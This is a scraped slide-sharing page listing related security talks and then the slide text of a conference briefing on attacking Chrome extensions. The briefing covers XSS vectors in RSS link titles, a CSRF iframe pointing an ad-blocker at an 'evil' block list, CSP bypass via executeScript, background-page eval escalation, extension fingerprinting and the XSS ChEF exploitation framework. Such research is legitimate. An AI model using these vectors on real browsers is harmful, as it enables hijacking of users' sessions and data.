Chromium ui framework(shared)
Chromium ui framework(shared)Chromium ui framework(shared)
Chromium ui framework(shared)
gnomekr
 
Roof
RoofRoof
Roof
Tariq H.M.A
 
Shell structure (basic concept)
Shell structure (basic concept)Shell structure (basic concept)
Shell structure (basic concept)
Ian Toisa
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
Krzysztof Kotowicz
 
Mobile-First SEO - The Marketers Edition #3XEDigital
Mobile-First SEO - The Marketers Edition #3XEDigitalMobile-First SEO - The Marketers Edition #3XEDigital
Mobile-First SEO - The Marketers Edition #3XEDigital
Aleyda Solís
 
The Minimum Loveable Product
The Minimum Loveable ProductThe Minimum Loveable Product
The Minimum Loveable Product
The Happy Startup School
 
How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)
How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)
How I got 2.5 Million views on Slideshare (by @nickdemey - Board of Innovation)
Board of Innovation
 
Ad

Similar to Advanced Chrome extension exploitation (20)

Securing your web application through HTTP headers
Securing your web application through HTTP headersSecuring your web application through HTTP headers
Securing your web application through HTTP headers
Andre N. Klingsheim
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasures
Roel Palmaers
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comes
Yury Chemerkin
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
Krzysztof Kotowicz
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
Frank Kim
 
Making Chrome Extension with AngularJS
Making Chrome Extension with AngularJSMaking Chrome Extension with AngularJS
Making Chrome Extension with AngularJS
Ben Lau
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers
OWASP
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
Roberto Suggi Liverani
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaults
Matias Korhonen
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Divyanshu
 
Foxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload DeliveryFoxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload Delivery
Dimitry Snezhkov
 
Devopsdays london: Let’s talk about security
Devopsdays london: Let’s talk about securityDevopsdays london: Let’s talk about security
Devopsdays london: Let’s talk about security
Justin Cormack
 
Chrome Apps & Extensions
Chrome Apps & ExtensionsChrome Apps & Extensions
Chrome Apps & Extensions
Varun Raj
 
Cloudflare and Drupal - fighting bots and traffic peaks
Cloudflare and Drupal - fighting bots and traffic peaksCloudflare and Drupal - fighting bots and traffic peaks
Cloudflare and Drupal - fighting bots and traffic peaks
Łukasz Klimek
 
Chrome extension 2014.08.03
Chrome extension 2014.08.03Chrome extension 2014.08.03
Chrome extension 2014.08.03
louisasea666
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
Krzysztof Kotowicz
 
Html5 security
Html5 securityHtml5 security
Html5 security
Krishna T
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
Securing your web application through HTTP headers
Securing your web application through HTTP headersSecuring your web application through HTTP headers
Securing your web application through HTTP headers
Andre N. Klingsheim
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasures
Roel Palmaers
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comes
Yury Chemerkin
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
Krzysztof Kotowicz
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
Frank Kim
 
Making Chrome Extension with AngularJS
Making Chrome Extension with AngularJSMaking Chrome Extension with AngularJS
Making Chrome Extension with AngularJS
Ben Lau
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers
OWASP
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
Roberto Suggi Liverani
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaults
Matias Korhonen
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Divyanshu
 
Foxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload DeliveryFoxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload Delivery
Dimitry Snezhkov
 
Devopsdays london: Let’s talk about security
Devopsdays london: Let’s talk about securityDevopsdays london: Let’s talk about security
Devopsdays london: Let’s talk about security
Justin Cormack
 
Chrome Apps & Extensions
Chrome Apps & ExtensionsChrome Apps & Extensions
Chrome Apps & Extensions
Varun Raj
 
Cloudflare and Drupal - fighting bots and traffic peaks
Cloudflare and Drupal - fighting bots and traffic peaksCloudflare and Drupal - fighting bots and traffic peaks
Cloudflare and Drupal - fighting bots and traffic peaks
Łukasz Klimek
 
Chrome extension 2014.08.03
Chrome extension 2014.08.03Chrome extension 2014.08.03
Chrome extension 2014.08.03
louisasea666
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
Krzysztof Kotowicz
 
Html5 security
Html5 securityHtml5 security
Html5 security
Krishna T
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
Ad

More from Krzysztof Kotowicz (12)

Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Krzysztof Kotowicz
 
Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018
Krzysztof Kotowicz
 
Trusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSSTrusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSS
Krzysztof Kotowicz
 
HTML5: Atak i obrona
HTML5: Atak i obronaHTML5: Atak i obrona
HTML5: Atak i obrona
Krzysztof Kotowicz
 
I'm in your browser, pwning your stuff
I'm in your browser, pwning your stuffI'm in your browser, pwning your stuff
I'm in your browser, pwning your stuff
Krzysztof Kotowicz
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
Krzysztof Kotowicz
 
Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comes
Krzysztof Kotowicz
 
Creating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScriptCreating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScript
Krzysztof Kotowicz
 
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScriptTworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Krzysztof Kotowicz
 
Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?
Krzysztof Kotowicz
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
Krzysztof Kotowicz
 
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Krzysztof Kotowicz
 
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Krzysztof Kotowicz
 
Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018
Krzysztof Kotowicz
 
Trusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSSTrusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSS
Krzysztof Kotowicz
 
HTML5: Atak i obrona
HTML5: Atak i obronaHTML5: Atak i obrona
HTML5: Atak i obrona
Krzysztof Kotowicz
 
I'm in your browser, pwning your stuff
I'm in your browser, pwning your stuffI'm in your browser, pwning your stuff
I'm in your browser, pwning your stuff
Krzysztof Kotowicz
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
Krzysztof Kotowicz
 
Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comes
Krzysztof Kotowicz
 
Creating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScriptCreating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScript
Krzysztof Kotowicz
 
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScriptTworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Krzysztof Kotowicz
 
Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?
Krzysztof Kotowicz
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
Krzysztof Kotowicz
 
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Krzysztof Kotowicz
 

Recently uploaded (20)

Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.
hpbmnnxrvb
 
HCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser EnvironmentsHCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser Environments
panagenda
 
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptxIncreasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Anoop Ashok
 
HCL Nomad Web – Best Practices und Verwaltung von Multiuser-Umgebungen
HCL Nomad Web – Best Practices und Verwaltung von Multiuser-UmgebungenHCL Nomad Web – Best Practices und Verwaltung von Multiuser-Umgebungen
HCL Nomad Web – Best Practices und Verwaltung von Multiuser-Umgebungen
panagenda
 
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep DiveDesigning Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
ScyllaDB
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath MaestroDev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
UiPathCommunity
 
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
SOFTTECHHUB
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
Quantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur MorganQuantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur Morgan
Arthur Morgan
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdfSAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
Precisely
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 
Generative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in BusinessGenerative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in Business
Dr. Tathagat Varma
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.
hpbmnnxrvb
 
HCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser EnvironmentsHCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser Environments
panagenda
 
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptxIncreasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Anoop Ashok
 
HCL Nomad Web – Best Practices und Verwaltung von Multiuser-Umgebungen
HCL Nomad Web – Best Practices und Verwaltung von Multiuser-UmgebungenHCL Nomad Web – Best Practices und Verwaltung von Multiuser-Umgebungen
HCL Nomad Web – Best Practices und Verwaltung von Multiuser-Umgebungen
panagenda
 
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep DiveDesigning Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
ScyllaDB
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath MaestroDev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
UiPathCommunity
 
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
SOFTTECHHUB
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
Quantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur MorganQuantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur Morgan
Arthur Morgan
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdfSAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
Precisely
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 
Generative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in BusinessGenerative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in Business
Dr. Tathagat Varma
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 

Advanced Chrome extension exploitation

  • 1. Advanced   Chrome  Extension  Exploita5on Kyle  ‘Kos’  Osborn Krzysztof  Kotowicz 1
  • 2. Introduc5on • Krzysztof  Kotowicz – IT  security  consultant  at  SecuRing – h<p://blog.kotowicz.net – @kkotowicz   • Kyle  Osborn – Pentester  at  AppSec  ConsulFng – h<p://kyleosborn.com/ – @theKos 2
  • 3. Previous  research • Kyle  Osborn,  Ma<  Johansen – Hacking  Google  ChromeOS  (BH  2011) • N.  Carlini,  A.  Porter  Felt,  D.  Wagner  -­‐  UC  Berkeley – An  EvaluaFon  of  the  Google  Chrome  Extension  Security   Architecture h<p://www.eecs.berkeley.edu/~afelt/ extensionvulnerabiliFes.pdf • Krzysztof  Kotowicz – h<p://blog.kotowicz.net/2012/02/intro-­‐to-­‐chrome-­‐addons-­‐ hacking.html 3
  • 4. Plan • Briefing – Chrome  extensions  security  101 – Abusing  Chrome  extensions – Easy  exploitaFon – Using  XSS  ChEF • Workshops – all  of  the  above  in  pracFce  &  more – h<p://kotowicz.net/brucon/ 4
  • 6. Chrome  extensions  security • Extensions  are  HTML5  applicaFons  packaged  in  signed  .crx   files • chrome-­‐extension://<id>  URLs • Have  access  to  powerful  API – chrome.tabs – chrome.history – chrome.cookies – chrome.proxy – bundled  plugins  (NPAPI) • Permissions  defined  in  manifest.json 6
  • 7. Chrome  extensions  security • Extensions  have  a  lot  of  power  to  abuse • How  bad  can  it  be?  Think... – global  XSS – idenFty  thec  (bookmarks,  history,  cookies) – filesystem  access – remote  code  execuFon  (meterpreter) 7
  • 8. Chrome  extensions  security Content  script • Can  interact  with  webpage  DOM – e.g.  execute  Javascript – isolated  worlds  for  page  JS  /  content  script  JS • No  access  to  chrome.*  API 8
  • 9. Chrome  extensions  security View  pages • Have  access  to  chrome.*  API • No  access  to  webpage  DOM • Content  scripts  and  view  pages  can  only   exchange  messages • Examples: – opFon  pages – new  tabs – popups 9
  • 10. Chrome  extensions  security Background  page • View  page  that  runs  constantly • Has  access  to  chrome.*  API • The  UlPmate  Target 10
  • 11. Chrome  extensions  security • Currently,  Chrome  extension  security  is  very   reliant  on  the  developer – WriFng  bad  code  is  easy – Giving  extensions  more  permissions  than   necessary  is  easier • Extensions  suffer  from  common  web   vulnerabili5es 11
  • 12. Chrome  extensions  security • XSS:    page  DOM  has  a  vector  that  is  grabbed   and  executed  by  extension   <link  rel="alternate"  type="application/rss+xml"   title="hello  <img  src=x  onerror='alert(1)'>"   href="/rss.rss"> • CSRF:  Page  directly  requests  extension  URLs <iframe  src="chrome-­‐extension://<id>/pages/ subscribe.html?location=//evil/whitelist"></iframe> 12
  • 13. Chrome  extensions  security • NPAPI  plugins  vulns – Extensions  can  use  NPAPI  plugins  (.dll,  .so  etc.) – Those  run  outside  of  Chrome  sandboxes – Full  permissions  of  current  OS  user – Possible  vulns:  RCE,  buffer  overflows,  path   disclosures,  command  injecFons,  ... • Manual  review  by  Google  if  plugin  is  used 13
  • 14. Chrome  extensions  security • Content-­‐Security-­‐Policy  prevents  XSS • Chrome  supports  CSP  in  the  webpages X-Content-Security-Policy, X-WebKit-CSP • Chrome  supports  CSP  in  extensions content_security_policy  in  manifest • But... 14
  • 15. Extensions  vs  CSP  in  webpage • Total  CSP  bypass – You  can  inject  any  code  via  extension   chrome.tabs.executeScript(null, {code:“alert(1)”}) – Injected  code: • is  same  origin  with  the  page  (document.cookie  etc.) • can  communicate  with  view  pages   (chrome.extension.sendMessage) 15
  • 16. Extensions  vs  CSP  in  manifest • Cannot  execute  arbitrary  code • Even  CSP  in  extension  +  CSP  in  webpage  does   not  make  you  100%  safe! – You  can  pivot  the  a<ack  through  webpage – You  need  addiFonal  vulnerabiliFes  to  exploit  this 16
  • 17. Chrome  extensions  security • Most  commonly  vulnerable – RSS  readers – Note  extensions – Web  Developer  extensions 17
  • 18. Chrome  extensions  security manifest.json • Defines  resources,  permissions,  name  etc. • v1 – insecure,  but  everyone  uses  it • v2 – Secure  Content-­‐Security-­‐Policy  by  default  (no  XSS!) – Pages  cannot  access  extension  URLs  (no  CSRF!) – Unpopular • 26  out  of  top  1000  extensions – Will  be  enforced  in  Q3  2013 18
  • 19. Chrome  extensions  security Installa5on  Methods • Chrome  Web  Store – curated  by  Google • .crx  install  from  any  website  (prompts  user) – Chrome  21  makes  off-­‐store  installs  harder • Drag  &  drop  .crx  to  chrome://extensions • Or  use  --enable-easy-off-store-extension-install  flag • MiTM  not  possible  due  to  cerFficate  signing 19
  • 21. Fingerprin5ng • The  simplest  method – Generate  a  list  of  known  extension  IDs,  and   bruteforce  chrome-­‐extension://ID/  resources  to   discovered  extensions – use  onerror/onload  to  check  for  existence • hZp://blog.kotowicz.net/2012/02/intro-­‐to-­‐ chrome-­‐addons-­‐hacking.html 21
  • 22. CSRF  -­‐  example • Chrome  Adblock  2.5.22 – Extension  UI  uses  pages/subscribe.html   – pages/subscribe.html?locaFon=url  will  subscribe   to  new  block  list var queryparts = parseUri.parseSearch(document.location.search);   BGcall("subscribe",       {id: 'url:' + queryparts.location}); • Can  be  called  by  any  webpage <iframe src="chrome-extension://<id>/pages/ subscribe.html?location=//evil/whitelist"> 22
  • 23. XSS  -­‐  example • Slick  RSS  +  Slick  RSS:  Feed  Finder – simple  injecFon  locaFon  (<link>  tag  Ftle) <link rel="alternate" type="application/rss+xml" title="hello <img src=x onerror='payload'>" href="/rss.rss"> 23
  • 24. Leveraging  XSS • Vector  in  page  =>  XSS  in  content  script – No  access  to  chrome.*  API – Only  chrome.extension.* • e.g.  chrome.extension.connect  &   chrome.extension.sendMessage  to  communicate – Need  to  elevate  to  view  script • From  view  script chrome.extension .getBackgroundPage() .eval(”mwahahahahaaaaa!”) 24
  • 26. NPAPI  vulns  -­‐  example • CR-­‐GPG  0.7.8    (gpg-­‐gmail  bridge) • GPG  in  gmail??? 26
  • 27. NPAPI  vulns  -­‐  example • Uses  external  gpg  install  through  NPAPI  plugin • Long  story  short: – Easy  to  get  from  this: 27
  • 28. NPAPI  vulns  -­‐  example • To  this: 28
  • 29. NPAPI  vulns  -­‐  example • To  this: 29
  • 30. NPAPI  vulns  -­‐  example • To  this: 30
  • 32. Easy  exploita5on • alert(1)  -­‐  Now  what? • Use  an  automated  tool  to  pillage  and  plunder • BeEF  does  a  great  job  hooking  into DOMs • But  –  Need  a  special  tool  designed  to  take   advantage  of  Chrome  extension  APIs 32
  • 33. Easy  exploita5on • Enter  XSS  ChEF (Chrome  Extension  Exploita2on  Framework) – Designed  from  the  ground  up  for   exploiFng  extensions – Fast  (uses  WebSockets) – Preloaded  with  automated a<ack  scripts 33
